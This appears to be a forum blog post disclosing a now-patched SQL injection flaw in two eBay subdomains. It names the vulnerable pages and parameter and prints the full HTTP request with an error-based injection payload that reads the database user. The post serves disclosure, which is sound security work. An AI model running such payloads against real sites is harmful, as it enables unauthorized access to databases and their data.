View RSS Feed

Inxroot

SQL Injection Vulnerability in ebay

Rating: 6 votes, 5.00 average.
Title: SQL Injection Vulnerability in eBay.com sub domains
Author: Yogesh D Jaygadkar
Reported: December 27, 2012
Fixed: Jan 15, 2013
Public Released: Jan 25, 2013
Thanks To: Darshit Ashara
Greets : Rahul Bro, Aasim, Sandeep, Sagar

Description:

Last Month I reported SQL Injection vulnerabilities in eBay.com sub domains. You can see how many days they took for patching & allowing me to publish the vulnerability. But finally they fixed it & listed me in their Researchers Acknowledgement Page.Like every other bounty hunter I was also searching for some vulnerability in EBAY.That time I have no idea that Ebay don’t give bounty for any vulnerability. Not even for SQL Injection.


POC:

Sub Domains: sea.ebay.com & export.ebay.co.th

Page:
sea.ebay.com/searchAnnoucement.php
export.ebay.co.th/searchAnnoucement.php

Vulnerable Parameter: “checkbox” Array POST parameter.

Search option in above pages provides a “Select Site” checkboxes which filters the search result by different countries.









HTTP Headers:

Host: sea.ebay.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://sea.ebay.com/searchAnnoucemen...ime=Jan%202012
Cookie: Cookie Value
Content-Type: application/x-www-form-urlencoded
Content-Length: 16

POST Contents: checkbox%5B%5D=(select+1+and+row(1%2c1)>(select+co unt(*)%2cconcat(CONCAT(CHAR(68)%2C(SELECT+USER())% 2CCHAR(65)%2CCHAR(86)%2CCHAR(73)%2CCHAR(68))%2c0x3 a%2cfloor(rand()*2))x+from+(select+1+union+select+ 2)a+group+by+x+limit+1))&


So this is all for submitting report. After that I simply used sqlmap the gr8

Tags: None Add / Edit Tags
Categories
Uncategorized

Comments

Trackbacks

Total Trackbacks 0
Trackback URL: